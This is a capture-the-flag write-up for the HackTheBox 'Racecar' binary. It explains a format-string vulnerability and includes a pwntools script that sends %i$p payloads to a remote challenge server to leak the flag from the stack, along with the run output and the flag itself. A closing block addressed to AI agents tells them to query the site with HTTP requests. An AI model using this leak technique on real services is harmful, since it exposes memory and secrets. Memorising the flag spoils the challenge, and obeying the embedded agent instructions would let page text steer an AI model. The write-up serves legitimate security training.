# Racecar
{% file src="/files/obqeUoJAvaWHSQiUncxK" %}
```
CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!
```
this binary is vulnerable to format string vulnerability and since the flag is declared in the stack we can use the format string vuln to leak the flag out of the stack
```bash
┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
______ |xxx|
/|_||_\`.__ | F |
( _ _ _\ |xxx|
*** =`-(_)--(_)-' | I |
|xxx|
| N |
|xxx|
| I |
|xxx|
_-_- _/\______\__ | S |
_-_-__ / ,-. -|- ,-.`-. |xxx|
_-_- `( o )----( o )-' | H |
`-' `-' |xxx|
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
Insert your data:
Name: name
Nickname: something
[+] Welcome [name]!
[*] Your name is [name] but everybody calls you.. [something]!
[*] Current coins: [69]
1. Car info
2. Car selection
> 2
Select car:
1. 🚗
2. 🏎
> 2
Select race:
1. Highway battle
2. Circuit
> 1
[*] Waiting for the race to finish...
[+] You won the race!! You get 100 coins!
[+] Current coins: [169]
[!] Do you have anything to say to the press after your big victory?
> %p %p %p %p %p %p %p %p
The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this:
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1
```
we don't know the position of the variable that holds the flag value in the stack so we will fuzz the stack and keep leaking until we leak the flag, and to do that we will build a fuzzer script using python
### Exploit :
```python
from pwn import *
flag = ''
# Let's fuzz x values
for i in range(100):
try:
# Connect to server
io = remote('83.136.253.251', 42831)
io.sendlineafter(b'Name: ', b'anas')
io.sendlineafter(b'Nickname: ', b'something')
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'> ', b'1')
# Format the counter
# e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
# Receive the response
io.recvline()
io.recvline()
result = io.recv()
if not b'nil' in result:
print(str(i) + ': ' + str(result))
try:
# Decode, reverse endianess and print
decoded = unhex(result.strip().decode()[2:])
reversed_hex = decoded[::-1]
print(str(reversed_hex))
# Build up flag
flag += reversed_hex.decode()
except BaseException:
pass
except EOFError:
pass
# Print and close
info(flag)
io.close()
```
let's run the fuzzer
```bash
┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py
...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
```
### Flag :
```
HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://sayonara.gitbook.io/writeups/hackthebox/challenges/pwn/racecar.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.